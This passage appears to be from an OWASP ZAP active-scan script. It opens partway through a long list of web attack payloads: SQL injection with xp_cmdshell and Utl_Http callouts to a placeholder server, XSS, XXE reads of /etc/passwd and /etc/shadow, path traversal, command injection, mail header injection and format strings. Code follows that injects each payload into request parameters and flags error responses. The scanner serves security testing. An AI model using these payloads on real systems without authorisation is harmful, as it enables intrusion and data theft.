"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//></SCRIPT>--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}",  
"'';--'<XSS>=&{()}",  
"'",  
"'",  
"#",  
"-",  
"--",  
"' --",  
"--';",  
"' ;",  
"= '",  
"= ;",  
"= --",  
"\x23",  
"\x27",  
"\x3D \x3B'",  
"\x3D \x27",  
"\x27\x4F\x52 SELECT *",  
"\x27\x6F\x72 SELECT *",  
"'or select *",  
"admin'--",  
"';shutdown--",  
"<>''%;)(&+",  
"' or ''='",  
"' or 'x'='x",  
"' or 'x'='x",  
"') or ('x'='x",  
"0 or 1=1",  
"' or 0=0 --",  
"' or 0=0 --",  
"or 0=0 --",  
"' or 0=0 #",  
"' or 0=0 #",  
"or 0=0 #",  
"' or 1=1--",  
"' or 1=1--",  
"' or '1'='1'--",  
"'' or 1 --''",  
"or 1=1--",  
"or%201=1",  
"or%201=1 --",  
"' or 1=1 or ''='",  
"' or 1=1 or ''='",  
"' or a=a--",  
"' or 'a'='a",  
"') or ('a'='a",  
"') or ('a'='a",  
"hi' or 'a'='a",  
"hi' or 1=1 --",  
"hi' or 1=1 --",  
"hi' or 'a'='a",  
"hi') or ('a'='a",  
"hi') or ('a'='a",  
"'hi' or 'x'='x';",  
"@variable",  
",@variable",  
"PRINT",  
"PRINT @@variable",  
"select",  
"insert",  
"as",  
"or",  
"procedure",  
"limit",  
"order by",  
"asc",  
"desc",  
"delete",  
"update",  
"distinct",  
"having",  
"truncate",  
"replace",  
"like",  
"handler",  
"bfilename",  
"' or username like '%",  
"' or uname like '%",  
"' or userid like '%",  
"' or uid like '%",  
"' or user like '%",  
"exec xp",  
"exec sp",  
"'; exec master..xp_cmdshell",  
"'; exec xp_regread",  
"t'exec master..xp_cmdshell 'nslookup www.google.com'--",  
"--sp_password",  
"\x27UNION SELECT",  
"' UNION SELECT",  
"' UNION ALL SELECT",  
"' or (EXISTS)",  
"' (select top 1",  
"'||UTL_HTTP.REQUEST",  
"1;SELECT%20*",  
"to_timestamp_tz",  
"tz_offset",  
"&lt;&gt;&quot;'%;)(&amp;+",  
"'%20or%201=1",  
"%27%20or%201=1",  
"%20$(sleep%2050)",  
"%20'sleep%2050'",  
"char%4039%41%2b%40SELECT",  
"&apos;%20OR",  
"'sqlattempt1",  
"(sqlattempt2)",  
"|",  
"%7C",  
"*|",  
"%2A%7C",  
"*(|(mail=*))",  
"%2A%28%7C%28mail%3D%2A%29%29",  
"*(|(objectclass=*))",  
"%2A%28%7C%28objectclass%3D%2A%29%29",  
"(",  
"%28",  
")",  
"%29",  
"&",  
"%26",  
"",  
"%21",  
"' or 1=1 or ''='",  
"' or ''='",  
"x' or 1=1 or 'x'='y",  
"/",  
"//",  
"//*",  
"*/",  
"@*",  
"count(/child::node())",  
"x' or name()='username' or 'x'='y",  
"<name>','')); phpinfo(); exit;/*</name>",  
"<[CDATA[<script>var n=0;while(true){n++;}</script>]]>",  
"<[CDATA[>]]>alert('XSS');<[CDATA[>]]>",  
"<?xml version='1.0' encoding='ISO-8859-1'?><foo><[CDATA[>]]>alert('XSS');<[CDATA[>]]></foo>",  
"<?xml version='1.0' encoding='ISO-8859-1'?><foo><[CDATA[' or 1=1 or ''=']]></foo>",  
"<?xml version='1.0' encoding='ISO-8859-1'?><ELEMENT foo ANY><//c:/boot.ini'>]><foo>&xxe;</foo>",  
"<?xml version='1.0' encoding='ISO-8859-1'?><ELEMENT foo ANY><////etc/passwd'>]><foo>&xxe;</foo>",  
"<?xml version='1.0' encoding='ISO-8859-1'?><ELEMENT foo ANY><////etc/shadow'>]><foo>&xxe;</foo>",  
"<?xml version='1.0' encoding='ISO-8859-1'?><ELEMENT foo ANY><////dev/random'>]><foo>&xxe;</foo>",  
"<xml ID=I><X><C><[CDATA[cript:alert('XSS');'>]]>",  
"<xml ID='xss'><I><B>&lt;IMG SRC='javas<alert('XSS')'&gt;</B></I></xml><SPAN DATASRC='#xss' DATAFLD='B' DATAFORMATAS='HTML'></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>",  
"<xml SRC='xsstest.xml' ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>",  
"<HTML xmlns:xss><?import namespace='xss' implementation='http://ha.ckers.org/xss.htc'><xss:xss>XSS</xss:xss></HTML>",  
"'",  
"'--",  
"' or 1=1--",  
"1 or 1=1--",  
"' or 1 in (@@version)--",  
"1 or 1 in (@@version)--",  
"'; waitfor delay '0:30:0'--",  
"1; waitfor delay '0:30:0'--",  
"'||Utl_Http.request('http://<yourservername>') from dual--",  
"1||Utl_Http.request('http://<yourservername>') from dual--",  
"xsstest",  
"xsstest%00'<>'",  
"</foo>",  
"<foo></foo>",  
"))))))))))",  
"../../../../../../../../../../boot.ini",  
"..\..\..\..\..\..\..\..\..\..\boot.ini",  
"../../../../../../../../../../windows/win.ini",  
"..\..\..\..\..\..\..\..\..\..\windows\win.ini",  
"|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &",  
"| ping -i 30 127.0.0.1 |",  
"| ping -n 30 127.0.0.1 |",  
"& ping -i 30 127.0.0.1 &",  
"& ping -n 30 127.0.0.1 &",  
"%0a ping -i 30 127.0.0.1 %0a",  
"`ping 127.0.0.1`",  
"echo 111111",  
"response.write 111111",  
":response.write 111111",  
"http://<yourservername>/",  
"<youremail>%0aCc:<youremail>",  
"<youremail>%0d%0aCc:<youremail>",  
"<youremail>%0aBcc:<youremail>",  
"<youremail>%0d%0aBcc:<youremail>",  
"%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a",  
"%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a",  
"# known cross platform source Code, file disclosure attack patterns - append after file or dir path",  
"%70",  
".%E2%73%70",  
"%2e0",  
"%2e",  
".",  
"\'",  
"?*",  
"%20",  
"%00",  
"%2f",  
"%5c",  
"count(/child::node())",  
"x' or name()='username' or 'x'='y",  
"<[CDATA[<script>var n=0;while(true){n++;}</script>]]>",  
"<[CDATA[>]]>alert('XSS');<[CDATA[>]]>",  
"'<?xml version=''1.0'' encoding=''ISO-8859-1''?><foo><[CDATA[>]]>alert('XSS');<[CDATA[>]]></foo>'",  
"'<?xml version=''1.0'' encoding=''ISO-8859-1''?><foo><[CDATA[' or 1=1 or ''=']]></foo>'",  
"'<?xml version=''1.0'' encoding=''ISO-8859-1''?><ELEMENT foo ANY><//c:/boot.ini''>]><foo>&xxe;</foo>'",  
"'<?xml version=''1.0'' encoding=''ISO-8859-1''?><ELEMENT foo ANY><////etc/passwd''>]><foo>&xxe;</foo>'",  
"'<?xml version=''1.0'' encoding=''ISO-8859-1''?><ELEMENT foo ANY><////etc/shadow''>]><foo>&xxe;</foo>'",  
"'<?xml version=''1.0'' encoding=''ISO-8859-1''?><ELEMENT foo ANY><////dev/random''>]><foo>&xxe;</foo>'",  
"'<xml ID=I><X><C><[CDATA[cript:alert('XSS');''>]]>'",  
"'<xml ID=''xss''><I><B><IMG SRC=''javas<alert('XSS')''></B></I></xml><SPAN DATASRC=''#xss'' DATAFLD=''B'' DATAFORMATAS=''HTML''></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>'",  
"'<xml SRC=''xsstest.xml'' ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>'",  
"'<HTML xmlns:xss><?import namespace=''xss'' implementation=''http://ha.ckers.org/xss.htc''><xss:xss>XSS</xss:xss></HTML>'",  
"%00",  
"NULL",  
"null",  
"'",  
"'",  
"<",  
"-",  
"=",  
"+",  
"'",  
"&",  
"",  
"|",  
"<",  
">",  
"'><script>alert(1)</script>",  
"%0d",  
"%0a",  
"%7f",  
"%ff",  
"-1",  
"other",  
"%s%p%x%d",  
"%99999999999s",  
"%08x",  
"%20d",  
"%20n",  
"%20x",  
"%20s",  
"%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d ",  
"%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i",  
"%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o",  
"%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u",  
"%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x",  
"%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X",  
"%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a",  
"%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A",  
"%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e",  
"%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E",  
"%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f",  
"%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F",  
"%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g",  
"%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G",  
"%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s",  
"%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p",  
"%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%",  
"XXXXX.%p",  
"XXXXX`perl -e 'print '.%p' x 80'`",  
"`perl -e 'print '.%p' x 80'`%n",  
"'",  
"@#$%%#$%#$@#$%$$@#$%^**(()",  
"@#0%#0##018387@#0^**(()",  
"'><script>'",  
"'>xxx<P>yyy",  
"'\t'",  
"#",  
"#&apos;",  
"#'",  
"#xA",  
"#xA#xD",  
"#xD",  
"#xD#xA",  
"$NULL",  
"$null",  
"%",  
"%00",  
"%00/",  
"%01%02%03%04%0a%0d%0aADSF",  
"%0a",  
"%20",  
"%20|",  
"%2500",  
"%250a",  
"%2A",  
"%2C",  
"%2e%2e%2f",  
"%3C%3F",  
"%5C",  
"%5C/",  
"%60",  
"%7C",  
"&#10;",  
"&#10;&#13;",  
"&#13;",  
"&#13;&#10;",  
"&apos;",  
"&quot;;id&quot;",  
"(')",  
"*",  
"*&apos;",  
"*'",  
"*|",  
"+%00",  
"-",  
"--",  
"-1",  
"-1.0",  
"-2",  
"-20",  
"-268435455",  
"..%%35%63",  
"..%%35c",  
"..%25%35%63",  
"..%255c",  
"..%5c",  
"..%bg%qf",  
"..%c0%af",  
"..%u2215",  
"..%u2216",  
"../",  
"..\'",  
"/",  
"/%00/",  
"/%2A",  
"/&apos;",  
"/'",  
"0",  
"00",  
"0xfffffff",  
"1",  
"1.0",  
"2",  
"2147483647",  
"268435455",  
"65536",  
"<  script > < / script>",  
"<?",  
"?x=",  
"?x='",  
"?x=>",  
"?x=|",  
"@&apos;",  
"@'",  
"A",  
"ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|",  
"FALSE",  
"NULL",  
"TRUE",  
"[&apos;]",  
"[']",  
"\'",  
"\'blah",  
"\&apos;",  
"\'",  
"\0",  
"\00",  
"\00\00",  
"\00\00\00",  
"\0\0",  
"\0\0\0",  
"\\",  
"\\/",  
"\\\\*",  
"\\\\?\\",  
"\t",  
"^&apos;",  
"^'",  
"`",  
"id%00",  
"id%00|",  
"null",  
"something%00html",  
"{&apos;}",  
"{'}",  
"|",  
"}"	
]

// Replace or extend these with your own evidence - regexes that indicate potential issues
// The default ones are a subset of https://github.com/fuzzdb-project/fuzzdb/blob/master/regex/errors.txt
var evidence = [
	"A syntax error has occurred",
	"Active Server Pages error",
	"ADODB.Field error",
	"An illegal character has been found in the statement",
	"An unexpected token .* was found",
	"ASP\\.NET is configured to show verbose error messages",
	"ASP\\.NET_SessionId",
	"Custom Error Message",
	"database error",
	"DB2 Driver",
	"DB2 Error",
	"DB2 ODBC",
	"detected an internal error",
	"Error converting data type varchar to numeric",
	"Error Diagnostic Information",
	"Error Report",
	"Fatal error",
	"Incorrect syntax near",
	"Index of",
	"Internal Server Error",
	"Invalid Path Character",
	"Invalid procedure call or argument",
	"invalid query",
	"Invision Power Board Database Error",
	"is not allowed to access",
	"JDBC Driver",
	"JDBC Error",
	"JDBC MySQL",
	"JDBC Oracle",
	"JDBC SQL",
	"Microsoft OLE DB Provider for ODBC Drivers",
	"Microsoft VBScript compilation error",
	"Microsoft VBScript error",
	"MySQL Driver",
	"mysql error",
	"MySQL Error",
	"mySQL error with query",
	"MySQL ODBC",
	"ODBC DB2",
	"ODBC Driver",
	"ODBC Error",
	"ODBC Microsoft Access",
	"ODBC Oracle",
	"ODBC SQL",
	"OLE/DB provider returned message",
	"on line",
	"on MySQL result index",
	"Oracle DB2",
	"Oracle Driver",
	"Oracle Error",
	"Oracle ODBC",
	"Parent Directory",
	"PHP Error",
	"PHP Parse error",
	"PHP Warning",
	"PostgreSQL query failed",
	"server object error",
	"SQL command not properly ended",
	"SQL Server Driver",
	"SQLException",
	"supplied argument is not a valid",
	"Syntax error in query expression",
	"The error occurred in",
	"The script whose uid is",
	"Type mismatch",
	"Unable to jump to row",
	"Unclosed quotation mark before the character string",
	"unexpected end of SQL command",
	"unexpected error",
	"Unterminated string constant",
	"Warning: mysql_query",
	"Warning: pg_connect",
	"You have an error in your SQL syntax near",
]

/**
 * Scans a 'node", i.e. an individual entry in the Sites Tree.
 * The scanNode function will typically be called once for every page. 
 * 
 * @param as - the ActiveScan parent object that will do all the core interface tasks 
 *     (i.e.: sending and receiving messages, providing access to Strength and Threshold settings,
 *     raising alerts, etc.). This is an ScriptsActiveScanner object.
 * @param msg - the HTTP Message being scanned. This is an HttpMessage object.
 */
function scanNode(as, msg) {
	// Do nothing here - this script just attacks parameters rather than nodes
}

/**
 * Scans a specific parameter in an HTTP message.
 * The scan function will typically be called for every parameter in every URL and Form for every page.
 * 
 * @param as - the ActiveScan parent object that will do all the core interface tasks 
 *     (i.e.: sending and receiving messages, providing access to Strength and Threshold settings,
 *     raising alerts, etc.). This is an ScriptsActiveScanner object.
 * @param msg - the HTTP Message being scanned. This is an HttpMessage object.
 * @param {string} param - the name of the parameter being manipulated for this test/scan.
 * @param {string} value - the original parameter value.
 */

function scan(as, msg, param, value) {

	//	' param=' + param + ' value=' + value);
	var max_attacks = attacks.length	// No limit for the 'INSANE' level ;)
	
	if (as.getAttackStrength() == 'LOW') {
		max_attacks = 6
	} else if (as.getAttackStrength() == 'MEDIUM') {
		max_attacks = 12
	} else if (as.getAttackStrength() == 'HIGH') {
		max_attacks = 24
	}

	for (var i in attacks) {
		// Dont exceed recommended number of attacks for strength
		// feel free to disable this locally ;)
		if (i > max_attacks) {
			return
		}
		// Copy requests before reusing them
		msg = msg.cloneRequest();

		// setParam (message, parameterName, newValue)
		as.setParam(msg, param, attacks[i]);
		
		// sendAndReceive(msg, followRedirect, handleAntiCSRFtoken)
		as.sendAndReceive(msg, false, false);

		// Add any generic checks here, eg
		var code = msg.getResponseHeader().getStatusCode()
		if (code >= 500 && code < 600) {
			raiseAlert(as, msg, param, attacks[i], code)
			// Only raise one alert per param
			return
		}

		var body = msg.getResponseBody().toString()
		var re = new RegExp(evidence.join('|'), 'i')
		var found = body.match(re)
		if (found) {	// Change to a test which detects the vulnerability
			raiseAlert(as, msg, param, attacks[i], found)
			// Only raise one alert per param
			return
		}
	
		// Check if the scan was stopped before performing lengthy tasks
		if (as.isStop()) {
			return
		}
	}
}

function raiseAlert(as, msg, param, attack, evidence) {
	// Replace with more suitable information
	// raiseAlert(risk, int confidence, String name, String description, String uri, 
	//		String param, String attack, String otherInfo, String solution, String evidence, 
	//		int cweId, int wascId, HttpMessage msg)
	// risk: 0: info, 1: low, 2: medium, 3: high
	// confidence: 0: falsePositive, 1: low, 2: medium, 3: high, 4: confirmed
	as.raiseAlert(3, 2, "Input Validation SDL Control Alert", "Validates SDL Control Input Validation.", 
		msg.getRequestHeader().getURI().toString(), 
		param, attack, ' ', evidence, 0, 0, msg);
}
